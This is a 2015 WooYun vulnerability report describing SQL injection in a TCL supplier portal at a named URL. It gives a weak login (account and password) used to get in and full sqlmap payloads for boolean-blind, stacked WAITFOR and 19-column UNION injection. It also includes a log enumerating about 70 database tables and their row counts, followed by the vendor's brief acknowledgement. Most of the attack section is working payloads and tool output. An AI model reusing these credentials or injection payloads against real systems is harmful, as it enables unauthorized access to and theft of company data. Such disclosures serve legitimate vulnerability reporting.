TCL某重要站点MSSQL注入（涉及大量数据信息可union）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0161557

漏洞标题：TCL某重要站点MSSQL注入（涉及大量数据信息可union）

漏洞作者： Looke

提交时间：2015-12-15 17:08

修复时间：2016-01-28 17:10

公开时间：2016-01-28 17:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-15：细节已通知厂商并且等待厂商处理中
2015-12-15：厂商已经确认，细节仅向厂商公开
2015-12-25：细节向核心白帽子及相关领域专家公开
2016-01-04：细节向普通白帽子公开
2016-01-14：细节向实习白帽子公开
2016-01-28：细节向公众公开

简要描述：

详细说明：

系统：http://vmi.tclking.com/
弱口令：100055 123456
登陆后发现一个查询处注入

漏洞地址：

---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTE3MjA4MTEwNA9kFgICAw9kFgYCAQ9kFgICAQ8PFgIeBFRleHQFOlRDTOeOi+eJjOS+m+W6lOWVhuWNj+WQjOW5s+WPsD4+5Y+R56Wo566h55CGPj7lj5Hnpajmn6Xor6JkZAIXDw8WAh4HVmlzaWJsZWhkZAIZDw8WAh8BZ2QWAgIDDzwrAA0BAA8WBB4LXyFEYXRhQm91bmRnHgtfIUl0ZW1Db3VudAIBZBYCZg9kFgQCAQ8PZBYEHgtvbm1vdXNlb3ZlcgVmY3VycmVudGNvbG9yPXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yO3RoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPScjZWJlZmZmJyx0aGlzLnN0eWxlLmZvbnRXZWlnaHQ9Jyc7Hgpvbm1vdXNlb3V0BUF0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jdXJyZW50Y29sb3IsdGhpcy5zdHlsZS5mb250V2VpZ2h0PScnOxYeZg8PFgIfAAUBMWRkAgEPDxYCHwAFBDA3MDJkZAICDw8WAh8ABQNDTllkZAIDDw8WAh8ABQYyMDEyMDRkZAIEDw8WAh8ABQgwNTk1NjQ1MmRkAgUPDxYCHwAFCTE4NDA5NC4yMGRkAgYPDxYCHwAFCDMxMjk2LjA1ZGQCBw8PFgIfAAUEMTcxMGRkAggPDxYCHwAFATlkZAIJDw8WAh8ABQYmbmJzcDtkZAIKDw8WAh8ABQYmbmJzcDtkZAILDw8WAh8ABQYmbmJzcDtkZAIMDw8WAh8ABQgyMDEzMDYwNmRkAg0PDxYCHwAFBjA5MjgyMWRkAg4PZBYCZg8VAQBkAgIPZBYGZg8PFgIfAAUG5ZCI6K6hZGQCBQ8PFgIfAAUIMTg0MDk0LjJkZAIGDw8WAh8ABQgzMTI5Ni4wNWRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQ5jaGtVbkNvbmZpcm1lZAUMY2hrQ29uZmlybWVkBQdnZHZJbmZvDzwrAAoBCAIBZMuc2LOHGHL8IahQQ0XyZ//r008p&__VIEWSTATEGENERATOR=5E109024&__EVENTVALIDATION=/wEWCALp2dChAgLD2vjTBwLWoOLpAgKF+878DALD5bnqCgLDlPiHCwLPlry/BQLTgfvCCkTih6mBYrW8Yvj4JFd+zc2kHXR+&txtBukrs=0702' AND 2611=2611 AND 'tcFj'='tcFj&txtWerks=&txtMon=&chkUnConfirmed=on&chkConfirmed=on&BtnQuery= %E6%8F%90  %E4%BA%A4  
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTE3MjA4MTEwNA9kFgICAw9kFgYCAQ9kFgICAQ8PFgIeBFRleHQFOlRDTOeOi+eJjOS+m+W6lOWVhuWNj+WQjOW5s+WPsD4+5Y+R56Wo566h55CGPj7lj5Hnpajmn6Xor6JkZAIXDw8WAh4HVmlzaWJsZWhkZAIZDw8WAh8BZ2QWAgIDDzwrAA0BAA8WBB4LXyFEYXRhQm91bmRnHgtfIUl0ZW1Db3VudAIBZBYCZg9kFgQCAQ8PZBYEHgtvbm1vdXNlb3ZlcgVmY3VycmVudGNvbG9yPXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yO3RoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPScjZWJlZmZmJyx0aGlzLnN0eWxlLmZvbnRXZWlnaHQ9Jyc7Hgpvbm1vdXNlb3V0BUF0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jdXJyZW50Y29sb3IsdGhpcy5zdHlsZS5mb250V2VpZ2h0PScnOxYeZg8PFgIfAAUBMWRkAgEPDxYCHwAFBDA3MDJkZAICDw8WAh8ABQNDTllkZAIDDw8WAh8ABQYyMDEyMDRkZAIEDw8WAh8ABQgwNTk1NjQ1MmRkAgUPDxYCHwAFCTE4NDA5NC4yMGRkAgYPDxYCHwAFCDMxMjk2LjA1ZGQCBw8PFgIfAAUEMTcxMGRkAggPDxYCHwAFATlkZAIJDw8WAh8ABQYmbmJzcDtkZAIKDw8WAh8ABQYmbmJzcDtkZAILDw8WAh8ABQYmbmJzcDtkZAIMDw8WAh8ABQgyMDEzMDYwNmRkAg0PDxYCHwAFBjA5MjgyMWRkAg4PZBYCZg8VAQBkAgIPZBYGZg8PFgIfAAUG5ZCI6K6hZGQCBQ8PFgIfAAUIMTg0MDk0LjJkZAIGDw8WAh8ABQgzMTI5Ni4wNWRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQ5jaGtVbkNvbmZpcm1lZAUMY2hrQ29uZmlybWVkBQdnZHZJbmZvDzwrAAoBCAIBZMuc2LOHGHL8IahQQ0XyZ//r008p&__VIEWSTATEGENERATOR=5E109024&__EVENTVALIDATION=/wEWCALp2dChAgLD2vjTBwLWoOLpAgKF+878DALD5bnqCgLDlPiHCwLPlry/BQLTgfvCCkTih6mBYrW8Yvj4JFd+zc2kHXR+&txtBukrs=0702';WAITFOR DELAY '0:0:5'--&txtWerks=&txtMon=&chkUnConfirmed=on&chkConfirmed=on&BtnQuery= %E6%8F%90  %E4%BA%A4  
    Type: UNION query
    Title: Generic UNION query (NULL) - 19 columns
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTE3MjA4MTEwNA9kFgICAw9kFgYCAQ9kFgICAQ8PFgIeBFRleHQFOlRDTOeOi+eJjOS+m+W6lOWVhuWNj+WQjOW5s+WPsD4+5Y+R56Wo566h55CGPj7lj5Hnpajmn6Xor6JkZAIXDw8WAh4HVmlzaWJsZWhkZAIZDw8WAh8BZ2QWAgIDDzwrAA0BAA8WBB4LXyFEYXRhQm91bmRnHgtfIUl0ZW1Db3VudAIBZBYCZg9kFgQCAQ8PZBYEHgtvbm1vdXNlb3ZlcgVmY3VycmVudGNvbG9yPXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yO3RoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPScjZWJlZmZmJyx0aGlzLnN0eWxlLmZvbnRXZWlnaHQ9Jyc7Hgpvbm1vdXNlb3V0BUF0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jdXJyZW50Y29sb3IsdGhpcy5zdHlsZS5mb250V2VpZ2h0PScnOxYeZg8PFgIfAAUBMWRkAgEPDxYCHwAFBDA3MDJkZAICDw8WAh8ABQNDTllkZAIDDw8WAh8ABQYyMDEyMDRkZAIEDw8WAh8ABQgwNTk1NjQ1MmRkAgUPDxYCHwAFCTE4NDA5NC4yMGRkAgYPDxYCHwAFCDMxMjk2LjA1ZGQCBw8PFgIfAAUEMTcxMGRkAggPDxYCHwAFATlkZAIJDw8WAh8ABQYmbmJzcDtkZAIKDw8WAh8ABQYmbmJzcDtkZAILDw8WAh8ABQYmbmJzcDtkZAIMDw8WAh8ABQgyMDEzMDYwNmRkAg0PDxYCHwAFBjA5MjgyMWRkAg4PZBYCZg8VAQBkAgIPZBYGZg8PFgIfAAUG5ZCI6K6hZGQCBQ8PFgIfAAUIMTg0MDk0LjJkZAIGDw8WAh8ABQgzMTI5Ni4wNWRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQ5jaGtVbkNvbmZpcm1lZAUMY2hrQ29uZmlybWVkBQdnZHZJbmZvDzwrAAoBCAIBZMuc2LOHGHL8IahQQ0XyZ//r008p&__VIEWSTATEGENERATOR=5E109024&__EVENTVALIDATION=/wEWCALp2dChAgLD2vjTBwLWoOLpAgKF+878DALD5bnqCgLDlPiHCwLPlry/BQLTgfvCCkTih6mBYrW8Yvj4JFd+zc2kHXR+&txtBukrs=0702' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113) CHAR(122) CHAR(118) CHAR(120) CHAR(113) CHAR(75) CHAR(67) CHAR(97) CHAR(86) CHAR(73) CHAR(107) CHAR(116) CHAR(120) CHAR(67) CHAR(75) CHAR(89) CHAR(104) CHAR(84) CHAR(103) CHAR(82) CHAR(73) CHAR(107) CHAR(118) CHAR(116) CHAR(113) CHAR(72) CHAR(119) CHAR(109) CHAR(87) CHAR(86) CHAR(105) CHAR(99) CHAR(67) CHAR(99) CHAR(85) CHAR(120) CHAR(70) CHAR(114) CHAR(74) CHAR(107) CHAR(116) CHAR(89) CHAR(74) CHAR(114) CHAR(98) CHAR(113) CHAR(120) CHAR(112) CHAR(122) CHAR(113),NULL,NULL,NULL,NULL,NULL-- &txtWerks=&txtMon=&chkUnConfirmed=on&chkConfirmed=on&BtnQuery= %E6%8F%90  %E4%BA%A4  
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000

漏洞证明：

数据库：

大量数据信息，后面网络不稳定跑得太慢，就不再跑了。

[16:24:36] [INFO] fetching tables for databases: DB2, Northwind, master, model,
msdb, pubs, tempdb
[16:24:36] [INFO] skipping system database 'tempdb'
[16:24:36] [INFO] skipping system database 'msdb'
[16:24:36] [INFO] skipping system database 'pubs'
[16:24:36] [INFO] skipping system database 'master'
[16:24:36] [INFO] skipping system database 'model'
[16:24:36] [INFO] fetching number of tables for database 'DB2'
[16:24:36] [INFO] resumed: 70
[16:24:36] [INFO] resumed: dbo.cgt04
[16:24:36] [INFO] resumed: dbo.cgt05
[16:24:36] [INFO] resumed: dbo.cgt07
[16:24:36] [INFO] resumed: dbo.deli_plan
[16:24:36] [INFO] resumed: dbo.deli_plan_his
[16:24:36] [INFO] resumed: dbo.dtproperties
[16:24:36] [INFO] resumed: dbo.kcm02
[16:24:36] [INFO] resumed: dbo.kcm02_bak
[16:24:36] [INFO] resumed: dbo.kct03
[16:24:36] [INFO] resumed: dbo.kct06
[16:24:36] [INFO] resumed: dbo.lifnr_list
[16:24:36] [INFO] resumed: dbo.panel_supply_info
[16:24:37] [INFO] resumed: dbo.panel_supply_info_his
[16:24:37] [INFO] resumed: dbo.pay_invoice
[16:24:37] [INFO] resumed: dbo.po0019_1
[16:24:37] [INFO] resumed: dbo.po0019_2
[16:24:37] [INFO] resumed: dbo.sap_stg_info
[16:24:37] [INFO] resumed: dbo.scm_commit_status
[16:24:37] [INFO] resumed: dbo.scm_fcst_info
[16:24:37] [INFO] resumed: dbo.scm_fcst_info_B2
[16:24:37] [INFO] resumed: dbo.scm_fcst_info_his
[16:24:37] [INFO] resumed: dbo.scm_fcst_po_info
[16:24:37] [INFO] resumed: dbo.scm_lgort_list
[16:24:37] [INFO] resumed: dbo.scm_lgort_map_list
[16:24:37] [INFO] resumed: dbo.scm_onroad_list
[16:24:37] [INFO] resumed: dbo.scm_panel_lifnr_list
[16:24:37] [INFO] resumed: dbo.scm_panel_lifnr_text
[16:24:37] [INFO] resumed: dbo.scm_planner_list
[16:24:37] [INFO] resumed: dbo.scm_rbc_list
[16:24:37] [INFO] resumed: dbo.scm_rbc_so_list
[16:24:37] [INFO] resumed: dbo.scm_reply_flag_list
[16:24:37] [INFO] resumed: dbo.scm_stg_info
[16:24:37] [INFO] resumed: dbo.scm_stg_status
[16:24:37] [INFO] resumed: dbo.scm_time_master
[16:24:37] [INFO] resumed: dbo.sqlmapoutput
[16:24:37] [INFO] resumed: dbo.streamflowdetail
[16:24:37] [INFO] resumed: dbo.streamflowdetail_his
[16:24:37] [INFO] resumed: dbo.streamflowheader
[16:24:37] [INFO] resumed: dbo.streamflowheader_his
[16:24:37] [INFO] resumed: dbo.sysconstraints
[16:24:37] [INFO] resumed: dbo.syssegments
[16:24:37] [INFO] resumed: dbo.USER_LoginList
[16:24:37] [INFO] resumed: dbo.USER_oper_dtl
[16:24:37] [INFO] resumed: dbo.USER_oper_hd
[16:24:37] [INFO] resumed: dbo.USER_role_dtl
[16:24:37] [INFO] resumed: dbo.USER_role_hd
[16:24:37] [INFO] resumed: dbo.USERDB
[16:24:37] [INFO] resumed: dbo.v_all_scm_fcst_info
[16:24:37] [INFO] resumed: dbo.v_all_scm_fcst_info_delivery
[16:24:37] [INFO] resumed: dbo.v_all_scm_fcst_info_v2
[16:24:37] [INFO] resumed: dbo.v_cgt05
[16:24:37] [INFO] resumed: dbo.v_cgt07
[16:24:37] [INFO] resumed: dbo.v_open_po_no_list
[16:24:37] [INFO] resumed: dbo.v_open_po_sum_list
[16:24:37] [INFO] resumed: dbo.v_open_po_sum_list_rbc
[16:24:38] [INFO] resumed: dbo.v_panel_supply_info
[16:24:38] [INFO] resumed: dbo.v_po0019_2
[16:24:38] [INFO] resumed: dbo.v_scm_delivery_info
[16:24:38] [INFO] resumed: dbo.v_scm_delivery_list
[16:24:38] [INFO] resumed: dbo.v_scm_fcst_info
[16:24:38] [INFO] resumed: dbo.v_scm_panel_lifnr_list
[16:24:38] [INFO] resumed: dbo.v_VM_Reg_Info_In
[16:24:38] [INFO] resumed: dbo.vendor_info
[16:24:38] [INFO] resumed: dbo.VM_Location
[16:24:38] [INFO] resumed: dbo.VM_LocationType
[16:24:38] [INFO] resumed: dbo.VM_reg_info
[16:24:38] [INFO] resumed: dbo.VM_reg_truck_list
[16:24:38] [INFO] resumed: dbo.XTM03
[16:24:38] [INFO] resumed: dbo.XTM03_BUKRS
[16:24:38] [INFO] resumed: dbo.ZMMIM0016_TK
[16:24:38] [INFO] skipping system database 'Northwind'
[16:24:38] [INFO] resumed: 4469
[16:24:38] [INFO] resumed: 5337
[16:24:38] [INFO] resumed: 69
[16:24:38] [INFO] resumed: 58
[16:24:38] [INFO] resumed: 181
[16:24:38] [INFO] resumed: 16
[16:24:38] [INFO] resumed: 83
[16:24:38] [INFO] resumed: 18
[16:24:38] [INFO] resumed: 241517
[16:24:38] [INFO] resumed: 16357
[16:24:38] [INFO] resumed: 17
[16:24:38] [INFO] resumed: 6
[16:24:38] [INFO] resumed: 206955
[16:24:38] [INFO] resumed: 4184787
[16:24:38] [INFO] resumed: 7719056
[16:24:38] [INFO] resumed: 4676347
[16:24:38] [INFO] resumed: 3
[16:24:38] [INFO] resumed: 0
[16:24:38] [INFO] resumed: 2
[16:24:38] [INFO] resumed: 383451
[16:24:38] [INFO] resumed: 484208
[16:24:38] [INFO] resumed: 10989
[16:24:38] [INFO] resumed: 12099533
[16:24:38] [INFO] resumed: 2
[16:24:38] [INFO] resumed: 755
[16:24:38] [INFO] resumed: 839455
[16:24:38] [INFO] resumed: 119790
[16:24:38] [INFO] resumed: 392872
[16:24:38] [INFO] resumed: 3512300
[16:24:39] [INFO] resumed: 8521
[16:24:39] [INFO] resumed: 0
[16:24:39] [INFO] resumed: 20427
[16:24:39] [INFO] resumed: 25610
[16:24:39] [INFO] resumed: 30420229
[16:24:39] [INFO] resumed: 0
[16:24:39] [INFO] resumed: 88
[16:24:39] [INFO] resumed: 4
[16:24:39] [INFO] resumed: 43
[16:24:39] [INFO] resumed: 103
[16:24:39] [INFO] resumed: 12
[16:24:39] [INFO] resumed: 70
[16:24:39] [INFO] resumed: 18
[16:24:39] [INFO] resumed: 8
[16:24:39] [INFO] resumed: 13
[16:24:39] [INFO] resumed: 952
[16:24:39] [INFO] resumed: 0
[16:24:39] [INFO] resumed: 284
[16:24:39] [INFO] resumed: 0
[16:24:39] [INFO] resumed: 2626938
[16:24:39] [INFO] resumed: 1659871
[16:24:39] [INFO] resumed: 851611
[16:24:39] [INFO] resumed: 419488
[16:24:39] [INFO] resumed: 91
[16:24:39] [INFO] resumed: 3
[16:24:39] [INFO] resumed: 4331
[16:24:39] [INFO] resumed: 19503
[16:24:39] [INFO] resuming partial value: 3228
[16:24:39] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[16:24:39] [INFO] retrieved:
[16:25:08] [WARNING] reflective value(s) found and filtering out
[16:26:03] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is
 going to retry the request(s)
[16:27:20] [INFO] retrieved: 9539
[16:30:14] [INFO] retrieved:
[16:30:44] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is
 going to retry the request(s)
7719
[16:36:49] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is
 going to retry the request(s)
[16:38:04] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is
 going to retry the request(s)
79
[16:41:28] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is
 going to retry the request(s)
2
[16:43:23] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is
 going to retry the request(s)
[16:44:13] [INFO] retrieved: 4676904
[16:45:27] [INFO] retrieved:
[16:45:57] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is
 going to retry the request(s)
[16:47:43] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is
 going to retry the request(s)
21

最后不要脸的求个高rank，求赏脸=_=

修复方案：

修改弱口令
内部系统自查下注入

版权声明：转载请注明来源 Looke@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2015-12-15 17:09

厂商回复：

感谢您对TCL的关注，谢谢！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0161557

漏洞标题：TCL某重要站点MSSQL注入（涉及大量数据信息可union）

相关厂商：TCL官方网上商城

漏洞作者： Looke

提交时间：2015-12-15 17:08

修复时间：2016-01-28 17:10

公开时间：2016-01-28 17:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Looke@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0161557

漏洞标题：TCL某重要站点MSSQL注入（涉及大量数据信息可union）

相关厂商：TCL官方网上商城

漏洞作者： Looke

提交时间：2015-12-15 17:08

修复时间：2016-01-28 17:10

公开时间：2016-01-28 17:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0161557"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Looke@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：